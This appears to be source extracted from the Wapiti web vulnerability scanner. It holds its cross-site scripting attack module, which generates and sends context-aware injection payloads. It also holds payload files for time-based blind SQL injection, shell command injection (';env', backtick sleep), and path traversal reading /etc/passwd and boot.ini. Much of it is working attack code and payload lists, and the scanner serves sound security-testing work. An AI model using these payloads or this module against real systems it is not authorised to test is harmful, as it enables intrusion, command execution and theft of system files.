of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA import random import BeautifulSoup import requests import os from wapitiCore.attack.attack import Attack from wapitiCore.language.vulnerability import Vulnerability, Anomaly from wapitiCore.net import HTTP class mod_xss(Attack): """This class implements a cross site scripting attack""" # magic strings we must see to be sure script is vulnerable to XSS # payloads must be created on those patterns script_ok = ["alert('__XSS__')", "alert(\"__XSS__\")", "String.fromCharCode(0,__XSS__,1)"] # simple payloads that doesn't rely on their position in the DOM structure # payloads injected after closing a tag attibute value (attrval) or in the # content of a tag (text node like beetween

and

) # only trick here must be on character encoding, filter bypassing, stuff like that # form the simplest to the most complex, Wapiti will stop on the first working independant_payloads = [] php_self_payload = "%3Cscript%3Ephpselfxss()%3C/script%3E" php_self_check = "" name = "xss" # two dict exported for permanent XSS scanning # GET_XSS structure : # {uniq_code : http://url/?param1=value1¶m2=uniq_code¶m3..., next_uniq_code : ...} GET_XSS = {} # POST XSS structure : # {uniq_code: [target_url, {param1: val1, param2: uniq_code, param3:...}, referer_ul], next_uniq_code : [...]...} POST_XSS = {} PHP_SELF = [] # key = xss code, value = payload SUCCESSFUL_XSS = {} CONFIG_FILE = "xssPayloads.txt" MSG_VULN = _("XSS vulnerability") def __init__(self, http, xmlRepGenerator): Attack.__init__(self, http, xmlRepGenerator) self.independant_payloads = self.loadPayloads(os.path.join(self.CONFIG_DIR, self.CONFIG_FILE)) def random_string(self): """Create a random unique ID that will be used to test injection.""" """It doesn't upercase letters as BeautifulSoup make some data lowercase.""" return "w" + "".join([random.choice("0123456789abcdefghjijklmnopqrstuvwxyz") for __ in range(0, 9)]) def _validXSSContentType(self, http_res): """Check wether the returned content-type header allow javascript evaluation.""" # When no content-type is returned, browsers try to display the HTML if not "content-type" in http_res.headers: return True # else only text/html will allow javascript (maybe text/plain will work for IE...) if "text/html" in http_res.headers["content-type"]: return True return False def attackGET(self, http_res): """This method performs the cross site scripting attack (XSS attack) with method GET""" # copies page = http_res.path params_list = http_res.get_params resp_headers = http_res.headers referer = http_res.referer headers = {} http_code = "" if referer: headers["referer"] = referer param_name = "PHP_SELF" # Some PHP scripts doesn't sanitize data coming from $_SERVER['PHP_SELF'] if page not in self.PHP_SELF: evil_req = None if page.endswith("/"): evil_req = HTTP.HTTPResource(page + self.php_self_payload) elif page.endswith(".php"): evil_req = HTTP.HTTPResource(page + "/" + self.php_self_payload) if evil_req is not None: if self.verbose == 2: print(u"+ {0}".format(evil_req.url)) try: data, http_code = self.HTTP.send(evil_req, headers=headers).getPageCode() except requests.exceptions.Timeout: data = "" self.logO(Anomaly.MSG_TIMEOUT, evil_req.url) self.logO(Anomaly.MSG_EVIL_REQUEST) self.logC(evil_req.http_repr) print('') self.logAnom(category=Anomaly.RES_CONSUMPTION, level=Anomaly.MEDIUM_LEVEL, request=evil_req, parameter=param_name, info=Anomaly.MSG_PARAM_TIMEOUT.format(param_name)) if self._validXSSContentType(evil_req) and self.php_self_check in data: self.logR(Vulnerability.MSG_PATH_INJECT, self.MSG_VULN, page) self.logR(Vulnerability.MSG_EVIL_URL, evil_req.url) self.logVuln(category=Vulnerability.XSS, level=Vulnerability.HIGH_LEVEL, request=evil_req, parameter=param_name, info=_("XSS vulnerability found via injection in the resource path")) elif http_code == "500": self.logAnom(category=Anomaly.ERROR_500, level=Anomaly.HIGH_LEVEL, request=evil_req, parameter=param_name, info=Anomaly.MSG_PARAM_500.format(param_name)) self.logO(Anomaly.MSG_500, evil_req.url) self.logO(Vulnerability.MSG_EVIL_REQUEST) self.logC(evil_req.http_repr) print('') self.PHP_SELF.append(page) timeouted = False returned500 = False # page is the url of the script # params_list is a list of [key, value] lists if not params_list: # Do not attack application-type files if not "content-type" in resp_headers: # Sometimes there's no content-type... so we rely on the document extension if (page.split(".")[-1] not in self.allowed) and page[-1] != "/": return elif not "text" in resp_headers["content-type"]: return url = page + "?__XSS__" if url not in self.attackedGET: self.attackedGET.append(url) code = self.random_string() test_req = HTTP.HTTPResource(page + "?" + code) self.GET_XSS[code] = (test_req, "QUERY_STRING") try: data, http_code = self.HTTP.send(test_req, headers=headers).getPageCode() except requests.exceptions.Timeout: data = "" if code in data: # Simple text injection worked, let's try with JS code payloads = self.generate_payloads(data, code) for payload in payloads: evil_req = HTTP.HTTPResource(page + "?" + self.HTTP.quote(payload)) if self.verbose == 2: print(u"+ {0}".format(evil_req)) try: dat, http_code = self.HTTP.send(evil_req, headers=headers).getPageCode() except requests.exceptions.Timeout: dat = "" if timeouted: continue self.logO(Anomaly.MSG_TIMEOUT, evil_req.url) self.logO(Anomaly.MSG_EVIL_REQUEST) self.logC(evil_req.http_repr) print('') self.logAnom(category=Anomaly.RES_CONSUMPTION, level=Anomaly.MEDIUM_LEVEL, request=evil_req, parameter=param_name, info=Anomaly.MSG_PARAM_TIMEOUT.format(param_name)) timeouted = True param_name = "QUERY_STRING" if self._validXSSContentType(evil_req) and dat is not None and len(dat) > 1: if payload.lower() in dat.lower(): self.SUCCESSFUL_XSS[code] = payload self.logVuln(category=Vulnerability.XSS, level=Vulnerability.HIGH_LEVEL, request=evil_req, parameter=param_name, info=_("XSS vulnerability found via injection in the query string")) self.logR(Vulnerability.MSG_QS_INJECT, self.MSG_VULN, page) self.logR(Vulnerability.MSG_EVIL_URL, evil_req.url) # No more payload injection break elif http_code == "500" and not returned500: self.logAnom(category=Anomaly.ERROR_500, level=Anomaly.HIGH_LEVEL, request=evil_req, parameter=param_name, info=Anomaly.MSG_PARAM_500.format(param_name)) self.logO(Anomaly.MSG_500, evil_req.url) self.logO(Vulnerability.MSG_EVIL_REQUEST) self.logC(evil_req.http_repr) print('') returned500 = True # URL contains parameters else: for i in xrange(len(params_list)): saved_value = params_list[i][1] if saved_value is None: saved_value = "" param_name = self.HTTP.quote(params_list[i][0]) params_list[i][1] = "__XSS__" url = page + "?" + self.HTTP.encode(params_list) if url not in self.attackedGET: self.attackedGET.append(url) code = self.random_string() params_list[i][1] = code test_req = HTTP.HTTPResource(page + "?" + self.HTTP.encode(params_list)) self.GET_XSS[code] = (test_req, param_name) try: data, http_code = self.HTTP.send(test_req, headers=headers).getPageCode() except requests.exceptions.Timeout: data = "" # is the random code on the webpage ? if code in data: # YES! But where exactly ? payloads = self.generate_payloads(data, code) for payload in payloads: params_list[i][1] = payload evil_req = HTTP.HTTPResource(page + "?" + self.HTTP.encode(params_list)) if self.verbose == 2: print(u"+ {0}".format(evil_req)) try: dat, http_code = self.HTTP.send(evil_req, headers=headers).getPageCode() except requests.exceptions.Timeout: dat = "" if timeouted: continue self.logO(Anomaly.MSG_TIMEOUT, evil_req.url) self.logO(Anomaly.MSG_EVIL_REQUEST) self.logC(evil_req.http_repr) print('') self.logAnom(category=Anomaly.RES_CONSUMPTION, level=Anomaly.MEDIUM_LEVEL, request=evil_req, parameter=param_name, info=Anomaly.MSG_PARAM_TIMEOUT.format(param_name)) timeouted = True if self._validXSSContentType(evil_req) and dat is not None and len(dat) > 1: if payload.lower() in dat.lower(): self.SUCCESSFUL_XSS[code] = payload self.logVuln(category=Vulnerability.XSS, level=Vulnerability.HIGH_LEVEL, request=evil_req, parameter=param_name, info=_("XSS vulnerability found via injection" " in the parameter {0}").format(param_name)) self.logR(Vulnerability.MSG_PARAM_INJECT, self.MSG_VULN, page, param_name) self.logR(Vulnerability.MSG_EVIL_URL, evil_req.url) # stop trying payloads and jum to the next parameter break elif http_code == "500" and not returned500: self.logAnom(category=Anomaly.ERROR_500, level=Anomaly.HIGH_LEVEL, request=evil_req, parameter=param_name, info=Anomaly.MSG_PARAM_500.format(param_name)) self.logO(Anomaly.MSG_500, evil_req.url) self.logO(Vulnerability.MSG_EVIL_REQUEST) self.logC(evil_req.http_repr) print('') returned500 = True # Restore the value of this argument before testing the next one params_list[i][1] = saved_value def attackPOST(self, form): """This method performs the cross site scripting attack (XSS attack) with method POST""" page = form.url referer = form.referer headers = {} if referer: headers["referer"] = referer param_name = "PHP_SELF" if page not in self.PHP_SELF: evil_req = None if page.endswith("/"): evil_req = HTTP.HTTPResource(page + self.php_self_payload) elif page.endswith(".php"): evil_req = HTTP.HTTPResource(page + "/" + self.php_self_payload) if evil_req: if self.verbose == 2: print(u"+ {0}".format(evil_req.url)) try: data, http_code = self.HTTP.send(evil_req, headers=headers).getPageCode() except requests.exceptions.Timeout: data = "" self.logO(Anomaly.MSG_TIMEOUT, evil_req.url) self.logO(Anomaly.MSG_EVIL_REQUEST) self.logC(evil_req.http_repr) print('') self.logAnom(category=Anomaly.RES_CONSUMPTION, level=Anomaly.MEDIUM_LEVEL, request=evil_req, parameter=param_name, info=Anomaly.MSG_PARAM_TIMEOUT.format(param_name)) if self._validXSSContentType(evil_req) and self.php_self_check in data: self.logR(Vulnerability.MSG_PATH_INJECT, self.MSG_VULN, page) self.logR(Vulnerability.MSG_EVIL_URL, evil_req.url) self.logVuln(category=Vulnerability.XSS, level=Vulnerability.HIGH_LEVEL, request=evil_req, parameter=param_name, info=_("XSS vulnerability found via injection in the resource path")) elif http_code == "500": self.logAnom(category=Anomaly.ERROR_500, level=Anomaly.HIGH_LEVEL, request=evil_req, parameter=param_name, info=Anomaly.MSG_PARAM_500.format(param_name)) self.logO(Anomaly.MSG_500, evil_req.url) self.logO(Vulnerability.MSG_EVIL_REQUEST) self.logC(evil_req.http_repr) print('') self.PHP_SELF.append(page) timeouted = False returned500 = False # copies get_params = form.get_params post_params = form.post_params file_params = form.file_params for params_list in [get_params, post_params, file_params]: for i in xrange(len(params_list)): param_name = self.HTTP.quote(params_list[i][0]) saved_value = params_list[i][1] if saved_value is None: saved_value = "" if params_list is file_params: params_list[i][1] = ["_XSS__", params_list[i][1][1]] else: params_list[i][1] = "__XSS__" # We keep an attack pattern to be sure a given form won't be attacked on the same field several times attack_pattern = HTTP.HTTPResource(form.path, method=form.method, get_params=get_params, post_params=post_params, file_params=file_params) if not attack_pattern in self.attackedPOST: self.attackedPOST.append(attack_pattern) code = self.random_string() if params_list is file_params: params_list[i][1][0] = code else: params_list[i][1] = code # will only memorize the last used payload (working or not) but the code will always be the good test_payload = HTTP.HTTPResource(form.path, method=form.method, get_params=get_params, post_params=post_params, file_params=file_params, referer=referer) self.POST_XSS[code] = (test_payload, param_name) try: data, http_code = self.HTTP.send(test_payload).getPageCode() except requests.exceptions.Timeout: data = "" # rapid search on the code to check injection if code in data: # found, now study where the payload is injected and how to exploit it payloads = self.generate_payloads(data, code) for payload in payloads: if params_list is file_params: params_list[i][1][0] = payload else: params_list[i][1] = payload evil_req = HTTP.HTTPResource(form.path, method=form.method, get_params=get_params, post_params=post_params, file_params=file_params, referer=referer) if self.verbose == 2: print(u"+ {0}".format(evil_req)) try: dat, http_code = self.HTTP.send(evil_req).getPageCode() except requests.exceptions.Timeout: dat = "" if timeouted: continue self.logO(Anomaly.MSG_TIMEOUT, evil_req.url) self.logO(Anomaly.MSG_EVIL_REQUEST) self.logC(evil_req.http_repr) print('') self.logAnom(category=Anomaly.RES_CONSUMPTION, level=Anomaly.MEDIUM_LEVEL, request=evil_req, parameter=param_name, info=Anomaly.MSG_PARAM_TIMEOUT.format(param_name)) timeouted = True if self._validXSSContentType(evil_req) and dat is not None and len(dat) > 1: if payload.lower() in dat.lower(): self.SUCCESSFUL_XSS[code] = payload self.logVuln(category=Vulnerability.XSS, level=Vulnerability.HIGH_LEVEL, request=evil_req, parameter=param_name, info=_("XSS vulnerability found via injection" " in the parameter {0}").format(param_name)) self.logR(Vulnerability.MSG_PARAM_INJECT, self.MSG_VULN, evil_req.url, param_name) self.logR(Vulnerability.MSG_EVIL_REQUEST) self.logC(evil_req.http_repr) print('') # Stop injecting payloads and move to the next parameter break elif http_code == "500" and not returned500: self.logAnom(category=Anomaly.ERROR_500, level=Anomaly.HIGH_LEVEL, request=evil_req, parameter=param_name, info=Anomaly.MSG_PARAM_500.format(param_name)) self.logO(Anomaly.MSG_500, evil_req.url) self.logO(Vulnerability.MSG_EVIL_REQUEST) self.logC(evil_req.http_repr) print('') returned500 = True # restore the saved parameter in the list params_list[i][1] = saved_value def closeNoscript(self, tag): """Return a string with each closing parent tags for escaping a noscript""" s = "" if tag.findParent("noscript"): curr = tag.parent while True: s += "".format(curr.name) if curr.name == "noscript": break curr = curr.parent return s # type/name/tag ex: attrval/img/src def study(self, bs_node, parent=None, keyword="", entries=[]): #if parent==None: # print("Keyword is: {0}".format(keyword)) if keyword in str(bs_node): if isinstance(bs_node, BeautifulSoup.Tag): if keyword in str(bs_node.attrs): for k, v in bs_node.attrs: if keyword in v: # print("Found in attribute value {0} of tag {1}".format(k, bs_node.name)) noscript = self.closeNoscript(bs_node) d = {"type": "attrval", "name": k, "tag": bs_node.name, "noscript": noscript} if d not in entries: entries.append(d) if keyword in k: # print("Found in attribute name {0} of tag {1}".format(k, bs_node.name)) noscript = self.closeNoscript(bs_node) d = {"type": "attrname", "name": k, "tag": bs_node.name, "noscript": noscript} if d not in entries: entries.append(d) elif keyword in bs_node.name: # print("Found in tag name") noscript = self.closeNoscript(bs_node) d = {"type": "tag", "value": bs_node.name, "noscript": noscript} if d not in entries: entries.append(d) # recursively search injection points for the same variable for x in bs_node.contents: self.study(x, parent=bs_node, keyword=keyword, entries=entries) elif isinstance(bs_node, BeautifulSoup.NavigableString): # print("Found in text, tag {0}".format(parent.name)) noscript = self.closeNoscript(bs_node) d = {"type": "text", "parent": parent.name, "noscript": noscript} if d not in entries: entries.append(d) # generate a list of payloads based on where in the webpage the js-code will be injected def generate_payloads(self, html_code, code): soup = BeautifulSoup.BeautifulSoup(html_code) # il faut garder la page non-retouchee en reserve... e = [] self.study(soup, keyword=code, entries=e) payloads = [] for elem in e: payload = "" # Try each case where our string can be found # Leave at the first possible exploitation found # Our string is in the value of a tag attribute # ex: if elem['type'] == "attrval": # print("tag -> {0}".format(elem['tag'])) # print(elem['name']) i0 = html_code.find(code) # i1=html_code[:i0].rfind("=") try: # find the position of name of the attribute we are in i1 = html_code[:i0].rfind(elem['name']) # stupid unicode errors, must check later except UnicodeDecodeError: continue start = html_code[i1:i0].replace(" ", "")[len(elem['name']):] # between the tag name and our injected attribute there is an equal sign # and (probably) a quote or a double-quote we need to close before putting our payload if start.startswith("='"): payload = "'" if start.startswith('="'): payload = '"' if elem['tag'].lower() == "img": payload += "/>" else: payload += ">" payload += elem['noscript'] # ok let's send the requests for xss in self.independant_payloads: js_code = payload + xss.replace("__XSS__", code) if js_code not in payloads: payloads.append(js_code) if elem['name'].lower() == "src" and elem['tag'].lower() in ["frame", "iframe"]: js_code = "javascript:String.fromCharCode(0,__XSS__,1);".replace("__XSS__", code) if js_code not in payloads: payloads.insert(0, js_code) # we control an attribute name # ex: elif elem['type'] == "attrname": # name,tag if code == elem['name']: for xss in self.independant_payloads: js_code = '>' + elem['noscript'] + xss.replace("__XSS__", code) if js_code not in payloads: payloads.append(js_code) # we control the tag name # ex: elif elem['type'] == "tag": if elem['value'].startswith(code): # use independant payloads, just remove the first character (<) for xss in self.independant_payloads: payload = elem['noscript'] + xss.replace("__XSS__", code) js_code = payload[1:] if js_code not in payloads: payloads.append(js_code) else: for xss in self.independant_payloads: js_code = "/>" + elem['noscript'] + xss.replace("__XSS__", code) if js_code not in payloads: payloads.append(js_code) # we control the text of the tag # ex: elif elem['type'] == "text": if elem['parent'] in ["title", "textarea"]: # we can't execute javascript in those tags if elem['noscript'] != "": payload = elem['noscript'] else: payload = "".format(elem['parent']) elif elem['parent'] == "script": # Control over the body of a script :) # Just check if we can use brackets js_code = "String.fromCharCode(0,__XSS__,1)".replace("__XSS__", code) if js_code not in payloads: payloads.insert(0, js_code) for xss in self.independant_payloads: js_code = payload + xss.replace("__XSS__", code) if js_code not in payloads: payloads.append(js_code) html_code = html_code.replace(code, "none", 1) # reduire la zone de recherche return payloads wapiti-2.3.0+dfsg/wapitiCore/config/000077500000000000000000000000001240201516300172755ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/config/attacks/000077500000000000000000000000001240201516300207275ustar00rootroot00000000000000wapiti-2.3.0+dfsg/wapitiCore/config/attacks/backupPayloads.txt000066400000000000000000000001621240201516300244310ustar00rootroot00000000000000[FILE_NAME]~ [FILE_NAME].backup [FILE_NAME].bck [FILE_NAME].old [FILE_NAME].save [FILE_NAME].bak .[FILE_NAME].swp wapiti-2.3.0+dfsg/wapitiCore/config/attacks/blindSQLPayloads.txt000066400000000000000000000166301240201516300246430ustar00rootroot00000000000000sleep(__TIME__)#1 sleep(__TIME__)#[LF]1 [VALUE],sleep(__TIME__)#1 [VALUE]`,sleep(__TIME__)#1 1 or sleep(__TIME__)#1 1 or sleep(__TIME__)#[LF]1 " or sleep(__TIME__)#1 " or sleep(__TIME__)#[LF]1 ' or sleep(__TIME__)#1 ' or sleep(__TIME__)#[LF]1 " or sleep(__TIME__)=" ' or sleep(__TIME__)=' 1) or sleep(__TIME__)#1 1) or sleep(__TIME__)#[LF]1 ") or sleep(__TIME__)=" ') or sleep(__TIME__)=' 1)) or sleep(__TIME__)#1 1)) or sleep(__TIME__)#[LF]1 ")) or sleep(__TIME__)=" ')) or sleep(__TIME__)=' 1 and sleep(__TIME__)#1 1 and sleep(__TIME__)#[LF]1 " and sleep(__TIME__)#1 " and sleep(__TIME__)#[LF]1 ' and sleep(__TIME__)#1 ' and sleep(__TIME__)#[LF]1 " and sleep(__TIME__)=" ' and sleep(__TIME__)=' 1) and sleep(__TIME__)#1 1) and sleep(__TIME__)#[LF]1 ") and sleep(__TIME__)=" ') and sleep(__TIME__)=' 1)) and sleep(__TIME__)#1 1)) and sleep(__TIME__)#[LF]1 ")) and sleep(__TIME__)=" ')) and sleep(__TIME__)=' ;waitfor delay '0:0:__TIME__'--1 [VALUE];waitfor delay '0:0:__TIME__'--1 [VALUE] waitfor delay '0:0:__TIME__'--1 ;waitfor delay '0:0:__TIME__'--[LF]1 );waitfor delay '0:0:__TIME__'--1 [VALUE]);waitfor delay '0:0:__TIME__'--1 );waitfor delay '0:0:__TIME__'--[LF]1 ';waitfor delay '0:0:__TIME__'--1 ';waitfor delay '0:0:__TIME__'--[LF]1 ";waitfor delay '0:0:__TIME__'--1 ";waitfor delay '0:0:__TIME__'--[LF]1 ');waitfor delay '0:0:__TIME__'--1 ');waitfor delay '0:0:__TIME__'--[LF]1 ");waitfor delay '0:0:__TIME__'--1 ");waitfor delay '0:0:__TIME__'--[LF]1 ));waitfor delay '0:0:__TIME__'--1 [VALUE]));waitfor delay '0:0:__TIME__'--1 ));waitfor delay '0:0:__TIME__'--[LF]1 '));waitfor delay '0:0:__TIME__'--1 '));waitfor delay '0:0:__TIME__'--[LF]1 "));waitfor delay '0:0:__TIME__'--1 "));waitfor delay '0:0:__TIME__'--[LF]1 benchmark(10000000,MD5(1))#1 1 or benchmark(10000000,MD5(1))#1 " or benchmark(10000000,MD5(1))#1 ' or benchmark(10000000,MD5(1))#1 1) or benchmark(10000000,MD5(1))#1 ") or benchmark(10000000,MD5(1))#1 ') or benchmark(10000000,MD5(1))#1 1)) or benchmark(10000000,MD5(1))#1 ")) or benchmark(10000000,MD5(1))#1 ')) or benchmark(10000000,MD5(1))#1 pg_sleep(__TIME__)--1 pg_sleep(__TIME__)--[LF]1 1 or pg_sleep(__TIME__)--1 1 or pg_sleep(__TIME__)--[LF]1 " or pg_sleep(__TIME__)--1 " or pg_sleep(__TIME__)--[LF]1 ' or pg_sleep(__TIME__)--1 ' or pg_sleep(__TIME__)--[LF]1 1) or pg_sleep(__TIME__)--1 1) or pg_sleep(__TIME__)--[LF]1 ") or pg_sleep(__TIME__)--1 ") or pg_sleep(__TIME__)--[LF]1 ') or pg_sleep(__TIME__)--1 ') or pg_sleep(__TIME__)--[LF]1 1)) or pg_sleep(__TIME__)--1 ")) or pg_sleep(__TIME__)--1 ')) or pg_sleep(__TIME__)--1 1 and pg_sleep(__TIME__)--1 " and pg_sleep(__TIME__)--1 ' and pg_sleep(__TIME__)--1 1) and pg_sleep(__TIME__)--1 ") and pg_sleep(__TIME__)--1 ') and pg_sleep(__TIME__)--1 1)) and pg_sleep(__TIME__)--1 ")) and pg_sleep(__TIME__)--1 ')) and pg_sleep(__TIME__)--1 1[TAB]or[TAB]sleep(__TIME__)#1 "[TAB]or[TAB]sleep(__TIME__)#1 '[TAB]or[TAB]sleep(__TIME__)#1 "[TAB]or[TAB]sleep(__TIME__)=" '[TAB]or[TAB]sleep(__TIME__)=' 1)[TAB]or[TAB]sleep(__TIME__)#1 ")[TAB]or[TAB]sleep(__TIME__)=" ')[TAB]or[TAB]sleep(__TIME__)=' 1))[TAB]or[TAB]sleep(__TIME__)#1 "))[TAB]or[TAB]sleep(__TIME__)=" '))[TAB]or[TAB]sleep(__TIME__)=' 1[TAB]and[TAB]sleep(__TIME__)#1 "[TAB]and[TAB]sleep(__TIME__)#1 '[TAB]and[TAB]sleep(__TIME__)#1 "[TAB]and[TAB]sleep(__TIME__)=" '[TAB]and[TAB]sleep(__TIME__)=' 1)[TAB]and[TAB]sleep(__TIME__)#1 ")[TAB]and[TAB]sleep(__TIME__)=" ')[TAB]and[TAB]sleep(__TIME__)=' 1))[TAB]and[TAB]sleep(__TIME__)#1 "))[TAB]and[TAB]sleep(__TIME__)=" '))[TAB]and[TAB]sleep(__TIME__)=' ;waitfor[TAB]delay[TAB]'0:0:__TIME__'--1 );waitfor[TAB]delay[TAB]'0:0:__TIME__'--1 ';waitfor[TAB]delay[TAB]'0:0:__TIME__'--1 ";waitfor[TAB]delay[TAB]'0:0:__TIME__'--1 ');waitfor[TAB]delay[TAB]'0:0:__TIME__'--1 ");waitfor[TAB]delay[TAB]'0:0:__TIME__'--1 ));waitfor[TAB]delay[TAB]'0:0:__TIME__'--1 '));waitfor[TAB]delay[TAB]'0:0:__TIME__'--1 "));waitfor[TAB]delay[TAB]'0:0:__TIME__'--1 1[TAB]or[TAB]benchmark(10000000,MD5(1))#1 "[TAB]or[TAB]benchmark(10000000,MD5(1))#1 '[TAB]or[TAB]benchmark(10000000,MD5(1))#1 1)[TAB]or[TAB]benchmark(10000000,MD5(1))#1 ")[TAB]or[TAB]benchmark(10000000,MD5(1))#1 ')[TAB]or[TAB]benchmark(10000000,MD5(1))#1 1))[TAB]or[TAB]benchmark(10000000,MD5(1))#1 "))[TAB]or[TAB]benchmark(10000000,MD5(1))#1 '))[TAB]or[TAB]benchmark(10000000,MD5(1))#1 1[TAB]or[TAB]pg_sleep(__TIME__)--1 "[TAB]or[TAB]pg_sleep(__TIME__)--1 '[TAB]or[TAB]pg_sleep(__TIME__)--1 1)[TAB]or[TAB]pg_sleep(__TIME__)--1 ")[TAB]or[TAB]pg_sleep(__TIME__)--1 ')[TAB]or[TAB]pg_sleep(__TIME__)--1 1))[TAB]or[TAB]pg_sleep(__TIME__)--1 "))[TAB]or[TAB]pg_sleep(__TIME__)--1 '))[TAB]or[TAB]pg_sleep(__TIME__)--1 1[TAB]and[TAB]pg_sleep(__TIME__)--1 "[TAB]and[TAB]pg_sleep(__TIME__)--1 '[TAB]and[TAB]pg_sleep(__TIME__)--1 1)[TAB]and[TAB]pg_sleep(__TIME__)--1 ")[TAB]and[TAB]pg_sleep(__TIME__)--1 ')[TAB]and[TAB]pg_sleep(__TIME__)--1 1))[TAB]and[TAB]pg_sleep(__TIME__)--1 "))[TAB]and[TAB]pg_sleep(__TIME__)--1 '))[TAB]and[TAB]pg_sleep(__TIME__)--1 1/**/or/**/sleep(__TIME__)#1 "/**/or/**/sleep(__TIME__)#1 '/**/or/**/sleep(__TIME__)#1 "/**/or/**/sleep(__TIME__)=" '/**/or/**/sleep(__TIME__)=' 1)/**/or/**/sleep(__TIME__)#1 ")/**/or/**/sleep(__TIME__)=" ')/**/or/**/sleep(__TIME__)=' 1))/**/or/**/sleep(__TIME__)#1 "))/**/or/**/sleep(__TIME__)=" '))/**/or/**/sleep(__TIME__)=' 1/**/and/**/sleep(__TIME__)#1 "/**/and/**/sleep(__TIME__)#1 '/**/and/**/sleep(__TIME__)#1 "/**/and/**/sleep(__TIME__)=" '/**/and/**/sleep(__TIME__)=' 1)/**/and/**/sleep(__TIME__)#1 ")/**/and/**/sleep(__TIME__)=" ')/**/and/**/sleep(__TIME__)=' 1))/**/and/**/sleep(__TIME__)#1 "))/**/and/**/sleep(__TIME__)=" '))/**/and/**/sleep(__TIME__)=' ;waitfor/**/delay/**/'0:0:__TIME__'--1 );waitfor/**/delay/**/'0:0:__TIME__'--1 ';waitfor/**/delay/**/'0:0:__TIME__'--1 ";waitfor/**/delay/**/'0:0:__TIME__'--1 ');waitfor/**/delay/**/'0:0:__TIME__'--1 ");waitfor/**/delay/**/'0:0:__TIME__'--1 ));waitfor/**/delay/**/'0:0:__TIME__'--1 '));waitfor/**/delay/**/'0:0:__TIME__'--1 "));waitfor/**/delay/**/'0:0:__TIME__'--1 1/**/or/**/benchmark(10000000,MD5(1))#1 "/**/or/**/benchmark(10000000,MD5(1))#1 '/**/or/**/benchmark(10000000,MD5(1))#1 1)/**/or/**/benchmark(10000000,MD5(1))#1 ")/**/or/**/benchmark(10000000,MD5(1))#1 ')/**/or/**/benchmark(10000000,MD5(1))#1 1))/**/or/**/benchmark(10000000,MD5(1))#1 "))/**/or/**/benchmark(10000000,MD5(1))#1 '))/**/or/**/benchmark(10000000,MD5(1))#1 1/**/or/**/pg_sleep(__TIME__)--1 "/**/or/**/pg_sleep(__TIME__)--1 '/**/or/**/pg_sleep(__TIME__)--1 1)/**/or/**/pg_sleep(__TIME__)--1 ")/**/or/**/pg_sleep(__TIME__)--1 ')/**/or/**/pg_sleep(__TIME__)--1 1))/**/or/**/pg_sleep(__TIME__)--1 "))/**/or/**/pg_sleep(__TIME__)--1 '))/**/or/**/pg_sleep(__TIME__)--1 1/**/and/**/pg_sleep(__TIME__)--1 "/**/and/**/pg_sleep(__TIME__)--1 '/**/and/**/pg_sleep(__TIME__)--1 1)/**/and/**/pg_sleep(__TIME__)--1 ")/**/and/**/pg_sleep(__TIME__)--1 ')/**/and/**/pg_sleep(__TIME__)--1 1))/**/and/**/pg_sleep(__TIME__)--1 "))/**/and/**/pg_sleep(__TIME__)--1 '))/**/and/**/pg_sleep(__TIME__)--1 ' and (SELECT * FROM [ODBC;DRIVER=SQL SERVER;Server=1.1.1.1;DATABASE=w].a.p)\0 " and (SELECT * FROM [ODBC;DRIVER=SQL SERVER;Server=1.1.1.1;DATABASE=w].a.p)\0 ') and (SELECT * FROM [ODBC;DRIVER=SQL SERVER;Server=1.1.1.1;DATABASE=w].a.p)\0 ") and (SELECT * FROM [ODBC;DRIVER=SQL SERVER;Server=1.1.1.1;DATABASE=w].a.p)\0 ')) and (SELECT * FROM [ODBC;DRIVER=SQL SERVER;Server=1.1.1.1;DATABASE=w].a.p)\0 ")) and (SELECT * FROM [ODBC;DRIVER=SQL SERVER;Server=1.1.1.1;DATABASE=w].a.p)\0 ';d=new Date();do{cd=new Date();}while(cd-d<10000);// ";d=new Date();do{cd=new Date();}while(cd-d<10000);// wapiti-2.3.0+dfsg/wapitiCore/config/attacks/execPayloads.txt000066400000000000000000000011261240201516300241110ustar00rootroot00000000000000;env a;env a);env [VALUE];env [VALUE][LF]env /e\0 a;exit(base64_decode('dzRwMXQxX2V2YWw='));// a;exit(base64_decode('dzRwMXQxX2V2YWw='));# ";exit(base64_decode('dzRwMXQxX2V2YWw='));// ";exit(base64_decode('dzRwMXQxX2V2YWw='));# ';exit(base64_decode('dzRwMXQxX2V2YWw='));// ';exit(base64_decode('dzRwMXQxX2V2YWw='));# ".exit(base64_decode('dzRwMXQxX2V2YWw='));// ".exit(base64_decode('dzRwMXQxX2V2YWw='));# '.exit(base64_decode('dzRwMXQxX2V2YWw='));// '.exit(base64_decode('dzRwMXQxX2V2YWw='));# exit(base64_decode('dzRwMXQxX2V2YWw='));// exit(base64_decode('dzRwMXQxX2V2YWw='));# a`)` a`sleep 600` wapiti-2.3.0+dfsg/wapitiCore/config/attacks/fileHandlingPayloads.txt000066400000000000000000000055361240201516300255620ustar00rootroot00000000000000http://www.google.fr/? /etc/passwd /etc/passwd\0 c:\\boot.ini c:\\boot.ini\0 ../../../../../../../../../../etc/passwd ../../../../../../../../../../../../../../../../../../../../etc/passwd ../../../../../../../../../../etc/passwd\0 ../../../../../../../../../../../../../../../../../../../../etc/passwd\0 ../../../../../../../../../../boot.ini ../../../../../../../../../../../../../../../../../../../../boot.ini ../../../../../../../../../../boot.ini\0 ../../../../../../../../../../../../../../../../../../../../boot.ini\0 [VALUE]/../../../../../../../../../../etc/passwd [VALUE]/../../../../../../../../../../../../../../../../../../../../etc/passwd [VALUE]/../../../../../../../../../../etc/passwd\0 [VALUE]/../../../../../../../../../../../../../../../../../../../../etc/passwd\0 [VALUE]/../../../../../../../../../../boot.ini [VALUE]/../../../../../../../../../../../../../../../../../../../../boot.ini [VALUE]/../../../../../../../../../../boot.ini\0 [VALUE]/../../../../../../../../../../../../../../../../../../../../boot.ini\0 [DIRVALUE]/../../../../../../../../../../etc/passwd [DIRVALUE]/../../../../../../../../../../../../../../../../../../../../etc/passwd [DIRVALUE]/../../../../../../../../../../etc/passwd\0 [DIRVALUE]/../../../../../../../../../../../../../../../../../../../../etc/passwd\0 [DIRVALUE]/../../../../../../../../../../boot.ini [DIRVALUE]/../../../../../../../../../../../../../../../../../../../../boot.ini [DIRVALUE]/../../../../../../../../../../boot.ini\0 